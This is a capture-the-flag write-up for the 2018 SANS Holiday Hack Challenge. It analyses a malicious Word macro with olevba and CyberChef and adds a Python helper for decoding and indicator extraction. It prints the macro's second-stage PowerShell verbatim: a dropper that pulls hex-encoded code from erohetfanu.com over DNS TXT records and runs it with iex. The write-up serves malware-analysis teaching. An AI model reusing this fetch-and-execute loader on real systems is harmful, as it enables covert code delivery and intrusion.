Salaheldin

March 14, 2019

Identify the Domain

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup


Hey, you’re pretty good at this security stuff. Could you help me further with what I suspect is a malicious Word document?

All the elves were emailed a cookie recipe right before all the infections. Take this document with a password of elves and find the domain it communicates with.


Dropper Download

Word docm macros can be extracted using olevba.

Perhaps we can use this to grab the ransomware source.

https://github.com/decalage2/oletools/wiki/olevba



1- Recommended: watch Chris Davis's talk on analyzing PowerShell malware:
https://www.youtube.com/watch?v=wd12XRq2DNk

2- Download the malicious Word document:

https://www.holidayhackchallenge.com/2018/challenges/CHOCOLATE_CHIP_COOKIE_RECIPE.zip



Alert ! Alert ! Alert !

[screenshot: 19-img-1.jpg]


3- You can get a ready-made Windows virtual machine from here:

https://developer.microsoft.com/en-us/windows/downloads/virtual-machines

or from here

https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

4- Run the virtual machine and copy the zipped malware file into it.

5- Unzip the file CHOCOLATE_CHIP_COOKIE_RECIPE.zip with the password elves.

6- You will get the malicious Word document CHOCOLATE_CHIP_COOKIE_RECIPE.docm.

7- Make sure you have Python 2.7 installed so that you can run the analysis tools:

https://www.python.org/downloads/release/python-2715/

Installation tutorial: https://www.howtogeek.com/197947/how-to-install-python-on-windows/

8- Make sure you have Visual Studio Code installed; it makes reading and editing PowerShell scripts easier: https://code.visualstudio.com/

9- Start PowerShell from the Windows menu.

10- Install the olevba tool. Since we are using a Windows 10 VM for this analysis, run the following command in the VM terminal:

pip install -U oletools

You can refer to the olevba wiki for more details: https://github.com/decalage2/oletools/wiki/olevba

11- Let's extract the macro from the malware using olevba:

  • Change to the directory where you put the malware file, then check with dir:

[screenshot: 19-img-2.jpg]

  • Run olevba to extract the macros from the malware file:
    olevba CHOCOLATE_CHIP_COOKIE_RECIPE.docm

[screenshot: 19-img-3.jpg]

  • This is the malicious PowerShell code carried by the macro:

[screenshot: 19-code-1.jpg, the macro's PowerShell one-liner]

  • We can either run the command itself or use an online tool to base64-decode and then inflate it into readable text:

Method 1:

Let's run the command, but first we need to modify it. Remove the following:
Then add | Out-File source-1.ps1 at the end to save the result to a file. The PowerShell code becomes:

[screenshot: 19-code-2, the modified one-liner]

Type this code into the terminal and run it, then check that the file source-1.ps1 exists by using the ls command.

[screenshot: 19-img-4.jpg]

Let's look at source-1.ps1: type .\source-1.ps1 (note that this executes the decoded script in your VM; Get-Content .\source-1.ps1 only prints it).

[screenshot: 19-img-5.jpg]


Method 2:
Using the online converter CyberChef: paste the base64 string into the input field, then add the From Base64 operation followed by the Raw Inflate operation:

[screenshot: 19-img-6.jpg]

Copy the result into a new file in Visual Studio Code and save it as source-1.ps1.


12- As you can see from both methods, the decoded script goes on to retrieve yet another PowerShell script to run:

# H2A: turn a string of hex pairs back into ASCII text
function H2A($a) {$o; $a -split '(..)' | ? { $_ } | forEach {[char]([convert]::toint16($_,16))} | forEach {$o = $o + $_}; return $o};
# hex-encoded name of the script being requested
$f = "77616E6E61636F6F6B69652E6D696E2E707331";
$h = "";
# the first TXT lookup returns the number of chunks; each numbered subdomain then returns one hex chunk of the script
foreach ($i in 0..([convert]::ToInt32((Resolve-DnsName -Server erohetfanu.com -Name "$f.erohetfanu.com" -Type TXT).strings, 10)-1)) {$h += (Resolve-DnsName -Server erohetfanu.com -Name "$i.$f.erohetfanu.com" -Type TXT).strings};
# decode the reassembled hex and execute it
iex($(H2A $h | Out-string))

It communicates with the domain erohetfanu.com, pulling the next stage down through DNS TXT records, and requests the script whose hex code 77616E6E61636F6F6B69652E6D696E2E707331 we decoded earlier to wannacookie.min.ps1.
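To make the two decoding steps above repeatable (base64 + raw inflate from Method 1/2, and the H2A hex-to-ASCII conversion from the second stage), here is an added Python helper that is not part of the original writeup or of any tool it mentions. It embeds the second-stage script shown above as constructed sample input, packs it the way the macro's one-liner expects (raw DEFLATE, then base64), decodes it back, and pulls out the DNS server and the hex-encoded filename as indicators. The function names, the packing helper and the regular expressions are my own assumptions, not something from the challenge.

```python
import base64
import re
import zlib

# Second-stage script as printed in the writeup, embedded here only as
# sample input for the decoder (constructed test data, not fetched anywhere).
STAGE2 = (
    'function H2A($a) {$o; $a -split \'(..)\' | ? { $_ } | forEach '
    '{[char]([convert]::toint16($_,16))} | forEach {$o = $o + $_}; return $o}; '
    '$f = "77616E6E61636F6F6B69652E6D696E2E707331"; $h = ""; '
    'foreach ($i in 0..([convert]::ToInt32((Resolve-DnsName -Server erohetfanu.com '
    '-Name "$f.erohetfanu.com" -Type TXT).strings, 10)-1)) '
    '{$h += (Resolve-DnsName -Server erohetfanu.com -Name "$i.$f.erohetfanu.com" '
    '-Type TXT).strings}; iex($(H2A $h | Out-string))'
)


def make_sample_stage1(script: str) -> str:
    """Constructed helper: pack a script as raw DEFLATE + base64, the same
    layout the macro's one-liner (and CyberChef's Raw Inflate) expects."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15 = raw deflate, no zlib header
    raw = comp.compress(script.encode("ascii")) + comp.flush()
    return base64.b64encode(raw).decode("ascii")


def decode_stage(b64: str) -> str:
    """'From Base64' followed by 'Raw Inflate', i.e. what Method 1 and Method 2 do by hand.
    Falls back to zlib/gzip framing in case a sample was wrapped differently."""
    data = base64.b64decode(b64)
    try:
        return zlib.decompress(data, -15).decode("utf-8", "replace")  # raw deflate
    except zlib.error:
        return zlib.decompress(data, 47).decode("utf-8", "replace")   # zlib or gzip header


def hex_to_ascii(h: str) -> str:
    """Python equivalent of the script's H2A: two hex digits per character."""
    return bytes.fromhex(h).decode("ascii")


def extract_dns_indicators(script: str) -> dict:
    """Pull the DNS server, the hex-encoded filename it asks for, and the decoded
    filename out of a decoded stage so they can go straight into a blocklist or report."""
    servers = set(re.findall(r"-Server\s+([\w.-]+)", script))
    hexnames = set(re.findall(r'\$f\s*=\s*"([0-9A-Fa-f]+)"', script))
    return {
        "servers": sorted(servers),
        "hex_names": sorted(hexnames),
        "decoded_names": sorted(hex_to_ascii(x) for x in hexnames),
    }


if __name__ == "__main__":
    stage1 = make_sample_stage1(STAGE2)          # what the macro would carry
    decoded = decode_stage(stage1)               # what source-1.ps1 contains
    print(decoded)
    print(extract_dns_indicators(decoded))
```

The `-15` window size is what distinguishes raw DEFLATE (CyberChef "Raw Inflate") from zlib-framed data; picking the wrong one is the usual reason a decoded blob comes out as garbage. The indicator extraction deliberately parses text instead of executing anything, so it is safe to run on the host rather than only inside the VM.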


📟 Go to your Badge > Objectives > Enter erohetfanu.com


Erohetfanu.com, I wonder what that means?